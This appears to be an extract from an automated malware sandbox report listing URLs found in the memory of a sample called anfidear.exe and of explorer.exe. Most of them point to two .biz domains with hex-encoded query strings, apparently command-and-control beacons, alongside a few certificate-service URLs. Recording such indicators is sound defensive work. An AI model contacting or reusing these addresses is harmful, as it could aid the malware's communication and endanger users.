Source: anfidear.exe, 00000001.00000002.4776932794.0000000002C82000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://isfusus-omoab.biz/d/N?027E6D397C7E6D397C4C6D157C7E6D1B206A89F3EE7E6D0F524C43004E4E5D177C
Source: anfidear.exe, 00000001.00000002.4776932794.0000000002C82000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://isfusus-omoab.biz/d/N?0285F4F00C85F4F00CB7F4DC0C85F4D25091103A9E85F4C622B7DAC93EB5C4DE0C
Source: anfidear.exe, 00000001.00000002.4776932794.0000000002C82000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://isfusus-omoab.biz/d/N?0287709ECE87709ECEB570B2CE8770BC929394545C8770A8E0B55EA7FCB740B0CE
Source: anfidear.exe, 00000001.00000002.4776932794.0000000002C82000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://isfusus-omoab.biz/d/N?028CFCCC358CFCCC35BEFCE0358CFCEE69981806A78CFCFA1BBED2F507BCCCE235
Source: anfidear.exe, 00000001.00000002.4776932794.0000000002C82000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://isfusus-omoab.biz/d/N?028F3253388F325338BD327F388F3271649BD699AA8F326516BD1C6A0ABF027D38
Source: anfidear.exe, 00000001.00000002.4776932794.0000000002C82000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://isfusus-omoab.biz/d/N?02901C10FD901C10FDA21C3CFD901C32A184F8DA6F901C26D3A23229CFA02C3EFD
Source: anfidear.exe, 00000001.00000002.4776932794.0000000002C82000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://isfusus-omoab.biz/d/N?02907F98B8907F98B8A27FB4B8907FBAE4849B522A907FAE96A251A18AA04FB6B8
Source: anfidear.exe, 00000001.00000002.4776932794.0000000002C82000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://isfusus-omoab.biz/d/N?02908BCB23908BCB23A28BE723908BE97F846F01B1908BFD0DA2A5F211A0BBE523
Source: anfidear.exe, 00000001.00000002.4776932794.0000000002C82000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://isfusus-omoab.biz/d/N?02908E1EB7908E1EB7A28E32B7908E3CEB846AD425908E2899A2A02785A0BE30B7
Source: anfidear.exe, 00000001.00000002.4776932794.0000000002C82000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://isfusus-omoab.biz/d/N?02962EB269962EB269A42E9E69962E903582CA78FB962E8447A4008B5BA61E9C69
Source: anfidear.exe, 00000001.00000002.4776932794.0000000002C82000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://isfusus-omoab.biz/d/N?02963BF098963BF098A43BDC98963BD2C482DF3A0A963BC6B6A415C9AAA60BDE98
Source: anfidear.exe, 00000001.00000002.4776932794.0000000002C82000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://isfusus-omoab.biz/d/N?02987E5EF3987E5EF3AA7E72F3987E7CAF8C9A9461987E68DDAA5067C1A84E70F3
Source: anfidear.exe, 00000001.00000002.4776932794.0000000002C82000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://isfusus-omoab.biz/d/N?0298E6EA3A98E6EA3AAAE6C63A98E6C8668C0220A898E6DC14AAC8D308A8D6C43A
Source: anfidear.exe, 00000001.00000002.4776932794.0000000002C82000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://isfusus-omoab.biz/d/N?029C7C076B9C7C076BAE7C2B6B9C7C25378898CDF99C7C3145AE523E59AC4C296B
Source: anfidear.exe, 00000001.00000002.4776932794.0000000002C82000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://isfusus-omoab.biz/d/N?02A2A1A43BA2A1A43B90A1883BA2A18667B6456EA9A2A19215908F9D0992918A3B
Source: anfidear.exe, 00000001.00000002.4776932794.0000000002C82000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://isfusus-omoab.biz/d/N?02A2CDEA7AA2CDEA7A90CDC67AA2CDC826B62920E8A2CDDC5490E3D34892FDC47A
Source: anfidear.exe, 00000001.00000002.4776932794.0000000002C82000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://isfusus-omoab.biz/d/N?02A846E1E0A846E1E09A46CDE0A846C3BCBCA22B72A846D7CE9A68D8D29876CFE0
Source: anfidear.exe, 00000001.00000002.4776932794.0000000002C82000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://isfusus-omoab.biz/d/N?02A8FF7209A8FF72099AFF5E09A8FF5055BC1BB89BA8FF44279AD14B3B98CF5C09
Source: anfidear.exe, 00000001.00000002.4776932794.0000000002C82000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://isfusus-omoab.biz/d/N?02B6A2E5AFB6A2E5AF84A2C9AFB6A2C7F3A2462F3DB6A2D381848CDC9D8692CBAF
Source: anfidear.exe, 00000001.00000002.4776932794.0000000002C82000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://isfusus-omoab.biz/d/N?02B84E71A2B84E71A28A4E5DA2B84E53FEACAABB30B84E478C8A604890887E5FA2
Source: anfidear.exe, 00000001.00000002.4776932794.0000000002C82000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://isfusus-omoab.biz/d/N?02C05D52A0C05D52A0F25D7EA0C05D70FCD4B99832C05D648EF2736B92F06D7CA0
Source: anfidear.exe, 00000001.00000002.4776932794.0000000002C82000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://isfusus-omoab.biz/d/N?02C25D8C15C25D8C15F05DA015C25DAE49D6B94687C25DBA3BF073B527F26DA215
Source: anfidear.exe, 00000001.00000002.4776932794.0000000002C82000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://isfusus-omoab.biz/d/N?02C2EBB14DC2EBB14DF0EB9D4DC2EB9311D60F7BDFC2EB8763F0C5887FF2DB9F4D
Source: anfidear.exe, 00000001.00000002.4776932794.0000000002C82000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://isfusus-omoab.biz/d/N?02C328EE3FC328EE3FF128C23FC328CC63D7CC24ADC328D811F106D70DF318C03F
Source: anfidear.exe, 00000001.00000002.4776932794.0000000002C82000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://isfusus-omoab.biz/d/N?02C4108CE5C4108CE5F610A0E5C410AEB9D0F44677C410BACBF63EB5D7F420A2E5
Source: anfidear.exe, 00000001.00000002.4776932794.0000000002C82000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://isfusus-omoab.biz/d/N?02D3CA4EE3D3CA4EE3E1CA62E3D3CA6CBFC72E8471D3CA78CDE1E477D1E3FA60E3
Source: anfidear.exe, 00000001.00000002.4776932794.0000000002C82000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://isfusus-omoab.biz/d/N?02DE61051DDE61051DEC61291DDE612741CA85CF8FDE613333EC4F3C2FEE512B1D
Source: anfidear.exe, 00000001.00000002.4776932794.0000000002C82000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://isfusus-omoab.biz/d/N?02DF8866EBDF8866EBED884AEBDF8844B7CB6CAC79DF8850C5EDA65FD9EFB848EB
Source: anfidear.exe, 00000001.00000002.4776932794.0000000002C82000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://isfusus-omoab.biz/d/N?02E45A11EAE45A11EAD65A3DEAE45A33B6F0BEDB78E45A27C4D67428D8D46A3FEA
Source: anfidear.exe, 00000001.00000002.4776932794.0000000002C82000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://isfusus-omoab.biz/d/N?02EC3B33E2EC3B33E2DE3B1FE2EC3B11BEF8DFF970EC3B05CCDE150AD0DC0B1DE2
Source: anfidear.exe, 00000001.00000002.4776932794.0000000002C82000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://isfusus-omoab.biz/d/N?02EC69B6C2EC69B6C2DE699AC2EC69949EF88D7C50EC6980ECDE478FF0DC5998C2
Source: anfidear.exe, 00000001.00000002.4776932794.0000000002C82000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://isfusus-omoab.biz/d/N?02F2AE1890F2AE1890C0AE3490F2AE3ACCE64AD202F2AE2EBEC08021A2C29E3690
Source: anfidear.exe, 00000001.00000002.4776932794.0000000002C82000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://isfusus-omoab.biz/d/N?02F3145DC0F3145DC0C11471C0F3147F9CE7F09752F3146BEEC13A64F2C32473C0
Source: anfidear.exe, 00000001.00000002.4776932794.0000000002C82000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://isfusus-omoab.biz/d/N?02F34215ABF34215ABC14239ABF34237F7E7A6DF39F3422385C16C2C99C3723BAB
Source: anfidear.exe, 00000001.00000002.4776932794.0000000002C82000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://isfusus-omoab.biz/d/N?02F364EDC4F364EDC4C164C1C4F364CF98E7802756F364DBEAC14AD4F6C354C3C4
Source: anfidear.exe, 00000001.00000002.4776932794.0000000002C82000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://isfusus-omoab.biz/d/N?02F3E87A71F3E87A71C1E85671F3E8582DE70CB0E3F3E84C5FC1C64343C3D85471
Source: anfidear.exe, 00000001.00000002.4776932794.0000000002C82000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://isfusus-omoab.biz/d/N?02F442B0C0F442B0C0C6429CC0F442929CE0A67A52F44286EEC66C89F2C4729EC0
Source: anfidear.exe, 00000001.00000002.4776932794.0000000002C82000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://isfusus-omoab.biz/d/N?02F4C97FB0F4C97FB0C6C953B0F4C95DECE02DB522F4C9499EC6E74682C4F951B0
Source: anfidear.exe, 00000001.00000002.4776932794.0000000002C82000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://isfusus-omoab.biz/d/N?02F595AE46F595AE46C7958246F5958C1AE17164D4F5959868C7BB9774C5A58046
Source: anfidear.exe, 00000001.00000002.4776932794.0000000002C82000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://isfusus-omoab.biz/d/N?02F647782FF647782FC447542FF6475A73E2A3B2BDF6474E01C469411DC677562F
Source: anfidear.exe, 00000001.00000002.4776932794.0000000002C82000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://isfusus-omoab.biz/d/N?02F6C3C21AF6C3C21AC4C3EE1AF6C3E046E2270888F6C3F434C4EDFB28C6F3EC1A
Source: anfidear.exe, 00000001.00000002.4776932794.0000000002C82000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://isfusus-omoab.biz/d/N?02F8EE0204F8EE0204CAEE2E04F8EE2058EC0AC896F8EE342ACAC03B36C8DE2C04
Source: explorer.exe, 00000005.00000002.4781575407.0000000008849000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.2326241159.0000000008849000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4781575407.0000000008701000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.2326241159.0000000008701000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
Source: explorer.exe, 00000005.00000002.4779334908.0000000006EDE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.2324403319.0000000006EDE000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertGlobalRootG2.crlhttp://crl4.digicert.com/Di
Source: explorer.exe, 00000005.00000000.2325255321.0000000007620000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000005.00000002.4776932594.00000000025E0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000005.00000000.2325269219.0000000007630000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://schemas.micro
Source: anfidear.exe, 00000001.00000002.4776932794.0000000002C82000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://unmomis.biz/d/N?0203620886036208863162248603622ADA1786C21403623EA8314C31B433522686
Source: anfidear.exe, 00000001.00000002.4776932794.0000000002C82000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://unmomis.biz/d/N?020385A7870385A78731858B87038585DB17616D15038591A931AB9EB533B58987
Source: anfidear.exe, 00000001.00000002.4776932794.0000000002C82000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://unmomis.biz/d/N?0204129F3404129F343612B3340412BD6810F655A60412A91A363CA6063422B134
Source: anfidear.exe, 00000001.00000002.4776932794.0000000002C82000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://unmomis.biz/d/N?0204855867048558673685746704857A3B106192F504856E4936AB615534B57667
Source: anfidear.exe, 00000001.00000002.4776932794.0000000002C82000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://unmomis.biz/d/N?0204E033A204E033A236E01FA204E011FE1004F93004E0058C36CE0A9034D01DA2
Source: anfidear.exe, 00000001.00000002.4776932794.0000000002C82000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://unmomis.biz/d/N?0206079229060792293407BE290607B07512E358BB0607A4073429AB1B3637BC29
Source: anfidear.exe, 00000001.00000002.4776932794.0000000002C82000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://unmomis.biz/d/N?02064CBA51064CBA51344C9651064C980D12A870C3064C8C7F34628363367C9451
Source: anfidear.exe, 00000001.00000002.4776932794.0000000002C82000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://unmomis.biz/d/N?020695CAB40695CAB43495E6B40695E8E8127100260695FC9A34BBF38636A5E4B4
Source: anfidear.exe, 00000001.00000002.4776932794.0000000002C82000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://unmomis.biz/d/N?02082B4A1F082B4A1F3A2B661F082B68431CCF808D082B7C313A05732D381B641F
Source: anfidear.exe, 00000001.00000002.4776932794.0000000002C82000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://unmomis.biz/d/N?020C0CB9040C0CB9043E0C95040C0C9B5818E873960C0C8F2A3E2280363C3C9704
Source: anfidear.exe, 00000001.00000002.4776932794.0000000002C82000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://unmomis.biz/d/N?020CD6A67F0CD6A67F3ED68A7F0CD6842318326CED0CD690513EF89F4D3CE6887F
Source: anfidear.exe, 00000001.00000002.4776932794.0000000002C82000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://unmomis.biz/d/N?02109E9225109E9225229EBE25109EB079047A58B7109EA40B22B0AB1720AEBC25
Source: anfidear.exe, 00000001.00000002.4776932794.0000000002C82000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://unmomis.biz/d/N?0210E27A6410E27A6422E2566410E258380406B0F610E24C4A22CC435620D25464
Source: anfidear.exe, 00000001.00000002.4776932794.0000000002C82000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://unmomis.biz/d/N?0216F0E01C16F0E01C24F0CC1C16F0C24002142A8E16F0D63224DED92E26C0CE1C
Source: anfidear.exe, 00000001.00000002.4776932794.0000000002C82000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://unmomis.biz/d/N?0218F0017918F001792AF02D7918F023250C14CBEB18F037572ADE384B28C02F79
Source: anfidear.exe, 00000001.00000002.4776932794.0000000002C82000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://unmomis.biz/d/N?02240F649C240F649C160F489C240F46C030EBAE0E240F52B216215DAE143F4A9C
Source: anfidear.exe, 00000001.00000002.4776932794.0000000002C82000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://unmomis.biz/d/N?022607E2FD2607E2FD1407CEFD2607C0A132E3286F2607D4D31429DBCF1637CCFD
Source: anfidear.exe, 00000001.00000002.4776932794.0000000002C82000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://unmomis.biz/d/N?022ECAA6A72ECAA6A71CCA8AA72ECA84FB3A2E6C352ECA90891CE49F951EFA88A7
Source: anfidear.exe, 00000001.00000002.4776932794.0000000002C82000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://unmomis.biz/d/N?02302FC254302FC254022FEE54302FE00824CB08C6302FF47A0201FB66001FEC54
Source: anfidear.exe, 00000001.00000002.4776932794.0000000002C82000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://unmomis.biz/d/N?02309AD177309AD177029AFD77309AF32B247E1BE5309AE75902B4E84500AAFF77
Source: anfidear.exe, 00000001.00000002.4776932794.0000000002C82000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://unmomis.biz/d/N?0234B70E1634B70E1606B7221634B72C4A2053C48434B738380699372404872016
Source: anfidear.exe, 00000001.00000002.4776932794.0000000002C82000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://unmomis.biz/d/N?0235C7CA9F35C7CA9F07C7E69F35C7E8C32123000D35C7FCB107E9F3AD05F7E49F
Source: anfidear.exe, 00000001.00000002.4776932794.0000000002C82000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://unmomis.biz/d/N?02460DDCE3460DDCE3740DF0E3460DFEBF52E91671460DEACD7423E5D1763DF2E3
Source: anfidear.exe, 00000001.00000002.4776932794.0000000002C82000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://unmomis.biz/d/N?0249F177D649F177D67BF15BD649F1558A5D15BD4449F141F87BDF4EE479C159D6
Source: anfidear.exe, 00000001.00000002.4776932794.0000000002C82000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://unmomis.biz/d/N?0250CB669650CB669662CB4A9650CB44CA442FAC0450CB50B862E55FA460FB4896
Source: anfidear.exe, 00000001.00000002.4776932794.0000000002C82000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://unmomis.biz/d/N?025A107E1D5A107E1D6810521D5A105C414EF4B48F5A104833683E472F6A20501D
Source: anfidear.exe, 00000001.00000002.4776932794.0000000002C82000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://unmomis.biz/d/N?025A48FCCB5A48FCCB6848D0CB5A48DE974EAC36595A48CAE56866C5F96A78D2CB
Source: anfidear.exe, 00000001.00000002.4776932794.0000000002C82000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://unmomis.biz/d/N?025ACD21165ACD211668CD0D165ACD034A4E29EB845ACD173868E318246AFD0F16
Source: anfidear.exe, 00000001.00000002.4776932794.0000000002C82000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://unmomis.biz/d/N?025B00FDB05B00FDB06900D1B05B00DFEC4FE437225B00CB9E692EC4826B30D3B0
Source: anfidear.exe, 00000001.00000002.4776932794.0000000002C82000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://unmomis.biz/d/N?025B2308AB5B2308AB692324AB5B232AF74FC7C2395B233E85690D31996B1326AB
Source: anfidear.exe, 00000001.00000002.4776932794.0000000002C82000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://unmomis.biz/d/N?025C2D1F5A5C2D1F5A6E2D335A5C2D3D0648C9D5C85C2D29746E0326686C1D315A
Source: anfidear.exe, 00000001.00000002.4776932794.0000000002C82000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://unmomis.biz/d/N?0260E8086260E8086252E8246260E82A3E740CC2F060E83E4C52C6315050D82662
Source: anfidear.exe, 00000001.00000002.4776932794.0000000002C82000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://unmomis.biz/d/N?0266915CED66915CED549170ED66917EB17275967F66916AC354BF65DF56A172ED
Source: anfidear.exe, 00000001.00000002.4776932794.0000000002C82000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://unmomis.biz/d/N?0268297521682975215A2959216829577D7CCDBFB36829430F5A074C1358195B21
Source: anfidear.exe, 00000001.00000002.4776932794.0000000002C82000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://unmomis.biz/d/N?02783D303B783D303B4A3D1C3B783D12676CD9FAA9783D06154A130909480D1E3B
Source: anfidear.exe, 00000001.00000002.4776932794.0000000002C82000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://unmomis.biz/d/N?02793952CB793952CB4B397ECB793970976DDD9859793964E54B176BF949097CCB
Source: anfidear.exe, 00000001.00000002.4776932794.0000000002C82000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://unmomis.biz/d/N?027A020A257A020A25480226257A0228796EE6C0B77A023C0B482C33174A322425
Source: anfidear.exe, 00000001.00000002.4776932794.0000000002C82000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://unmomis.biz/d/N?027E74C03B7E74C03B4C74EC3B7E74E2676A900AA97E74F6154C5AF9094E44EE3B
Source: anfidear.exe, 00000001.00000002.4776932794.0000000002C82000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://unmomis.biz/d/N?027E85037E7E85037E4C852F7E7E8521226A61C9EC7E8535504CAB3A4C4EB52D7E
Source: anfidear.exe, 00000001.00000002.4776932794.0000000002C82000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://unmomis.biz/d/N?027ECECEEA7ECECEEA4CCEE2EA7ECEECB66A2A04787ECEF8C44CE0F7D84EFEE0EA
Source: anfidear.exe, 00000001.00000002.4776932794.0000000002C82000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://unmomis.biz/d/N?02805AE06B805AE06BB25ACC6B805AC23794BE2AF9805AD645B274D959B06ACE6B
Source: anfidear.exe, 00000001.00000002.4776932794.0000000002C82000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://unmomis.biz/d/N?0289BCEFF789BCEFF7BBBCC3F789BCCDAB9D58256589BCD9D9BB92D6C5B98CC1F7
Source: anfidear.exe, 00000001.00000002.4776932794.0000000002C82000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://unmomis.biz/d/N?028CE06A3B8CE06A3BBEE0463B8CE048679804A0A98CE05C15BECE5309BCD0443B
Source: anfidear.exe, 00000001.00000002.4776932794.0000000002C82000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://unmomis.biz/d/N?028FDC6EF68FDC6EF6BDDC42F68FDC4CAA9B38A4648FDC58D8BDF257C4BFEC40F6
Source: anfidear.exe, 00000001.00000002.4776932794.0000000002C82000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://unmomis.biz/d/N?029290CC2B9290CC2BA090E02B9290EE77867406B99290FA05A0BEF519A2A0E22B
Source: anfidear.exe, 00000001.00000002.4776932794.0000000002C82000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://unmomis.biz/d/N?0298F2DF2E98F2DF2EAAF2F32E98F2FD728C1615BC98F2E900AADCE61CA8C2F12E
Source: anfidear.exe, 00000001.00000002.4776932794.0000000002C82000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://unmomis.biz/d/N?0299396D2A99396D2AAB39412A99394F768DDDA7B899395B04AB175418A909432A
Source: anfidear.exe, 00000001.00000002.4776932794.0000000002C82000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://unmomis.biz/d/N?029C20DE179C20DE17AE20F2179C20FC4B88C414859C20E839AE0EE725AC10F017
Source: anfidear.exe, 00000001.00000002.4776932794.0000000002C82000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://unmomis.biz/d/N?02A8648022A86480229A64AC22A864A27EBC804AB0A864B60C9A4AB9109854AE22
Source: anfidear.exe, 00000001.00000002.4776932794.0000000002C82000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://unmomis.biz/d/N?02AA9B7950AA9B7950989B5550AA9B5B0CBE7FB3C2AA9B4F7E98B540629AAB5750
Source: anfidear.exe, 00000001.00000002.4776932794.0000000002C82000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://unmomis.biz/d/N?02B08222EFB08222EF82820EEFB08200B3A466E87DB08214C182AC1BDD80B20CEF
Source: anfidear.exe, 00000001.00000002.4776932794.0000000002C82000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://unmomis.biz/d/N?02B2887055B288705580885C55B2885209A66CBAC7B288467B80A6496782B85E55
Source: anfidear.exe, 00000001.00000002.4776932794.0000000002C82000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://unmomis.biz/d/N?02B2D2BCABB2D2BCAB80D290ABB2D29EF7A6367639B2D28A8580FC859982E292AB
Source: anfidear.exe, 00000001.00000002.4776932794.0000000002C82000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://unmomis.biz/d/N?02B2F78E31B2F78E3180F7A231B2F7AC6DA61344A3B2F7B81F80D9B70382C7A031
Source: anfidear.exe, 00000001.00000002.4776932794.0000000002C82000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://unmomis.biz/d/N?02B615D577B615D5778415F977B615F72BA2F11FE5B615E359843BEC458625FB77
Source: anfidear.exe, 00000001.00000002.4776932794.0000000002C82000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://unmomis.biz/d/N?02B61CAFADB61CAFAD841C83ADB61C8DF1A2F8653FB61C99838432969F862C81AD
Source: anfidear.exe, 00000001.00000002.4776932794.0000000002C82000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://unmomis.biz/d/N?02B6A25941B6A2594184A27541B6A27B1DA24693D3B6A26F6F848C607386927741
Source: anfidear.exe, 00000001.00000002.4776932794.0000000002C82000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://unmomis.biz/d/N?02BE7E52F1BE7E52F18C7E7EF1BE7E70ADAA9A9863BE7E64DF8C506BC38E4E7CF1
Source: anfidear.exe, 00000001.00000002.4776932794.0000000002C82000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://unmomis.biz/d/N?02C2050662C2050662F0052A62C205243ED6E1CCF0C205304CF02B3F50F2352862
Source: anfidear.exe, 00000001.00000002.4776932794.0000000002C82000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://unmomis.biz/d/N?02C406AD19C406AD19F6068119C4068F45D0E2678BC4069B37F628942BF4368319
Source: anfidear.exe, 00000001.00000002.4776932794.0000000002C82000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://unmomis.biz/d/N?02C415E151C415E151F615CD51C415C30DD0F12BC3C415D77FF63BD863F425CF51
Source: anfidear.exe, 00000001.00000002.4776932794.0000000002C82000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://unmomis.biz/d/N?02C42D6ED0C42D6ED0F62D42D0C42D4C8CD0C9A442C42D58FEF60357E2F41D40D0
Source: anfidear.exe, 00000001.00000002.4776932794.0000000002C82000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://unmomis.biz/d/N?02C43EE882C43EE882F63EC482C43ECADED0DA2210C43EDEACF610D1B0F40EC682
Source: anfidear.exe, 00000001.00000002.4776932794.0000000002C82000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://unmomis.biz/d/N?02C49CAA49C49CAA49F69C8649C49C8815D07860DBC49C9C67F6B2937BF4AC8449
Source: anfidear.exe, 00000001.00000002.4776932794.0000000002C82000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://unmomis.biz/d/N?02CA714C9BCA714C9BF871609BCA716EC7DE958609CA717AB5F85F75A9FA41629B
Source: anfidear.exe, 00000001.00000002.4776932794.0000000002C82000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://unmomis.biz/d/N?02D04154BED04154BEE24178BED04176E2C4A59E2CD0416290E26F6D8CE0717ABE
Source: anfidear.exe, 00000001.00000002.4776932794.0000000002C82000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://unmomis.biz/d/N?02D0BDE735D0BDE735E2BDCB35D0BDC569C4592DA7D0BDD11BE293DE07E08DC935
Source: anfidear.exe, 00000001.00000002.4776932794.0000000002C82000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://unmomis.biz/d/N?02D382CF12D382CF12E182E312D382ED4EC7660580D382F93CE1ACF620E3B2E112
Source: anfidear.exe, 00000001.00000002.4776932794.0000000002C82000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://unmomis.biz/d/N?02DE1C0024DE1C0024EC1C2C24DE1C2278CAF8CAB6DE1C360AEC323916EE2C2E24
Source: anfidear.exe, 00000001.00000002.4776932794.0000000002C82000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://unmomis.biz/d/N?02DF48C8F3DF48C8F3ED48E4F3DF48EAAFCBAC0261DF48FEDDED66F1C1EF78E6F3
Source: anfidear.exe, 00000001.00000002.4776932794.0000000002C82000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://unmomis.biz/d/N?02E07A5CF4E07A5CF4D27A70F4E07A7EA8F49E9666E07A6ADAD25465C6D04A72F4
Source: anfidear.exe, 00000001.00000002.4776932794.0000000002C82000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://unmomis.biz/d/N?02E494F3C1E494F3C1D694DFC1E494D19DF0703953E494C5EFD6BACAF3D4A4DDC1
Source: anfidear.exe, 00000001.00000002.4776932794.0000000002C82000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://unmomis.biz/d/N?02E4B467F9E4B467F9D6B44BF9E4B445A5F050AD6BE4B451D7D69A5ECBD48449F9
Source: anfidear.exe, 00000001.00000002.4776932794.0000000002C82000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://unmomis.biz/d/N?02EB6D2853EB6D2853D96D0453EB6D0A0FFF89E2C1EB6D1E7DD9431161DB5D0653
Source: anfidear.exe, 00000001.00000002.4776932794.0000000002C82000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://unmomis.biz/d/N?02F82ABB9AF82ABB9ACA2A979AF82A99C6ECCE7108F82A8DB4CA0482A8C81A959A
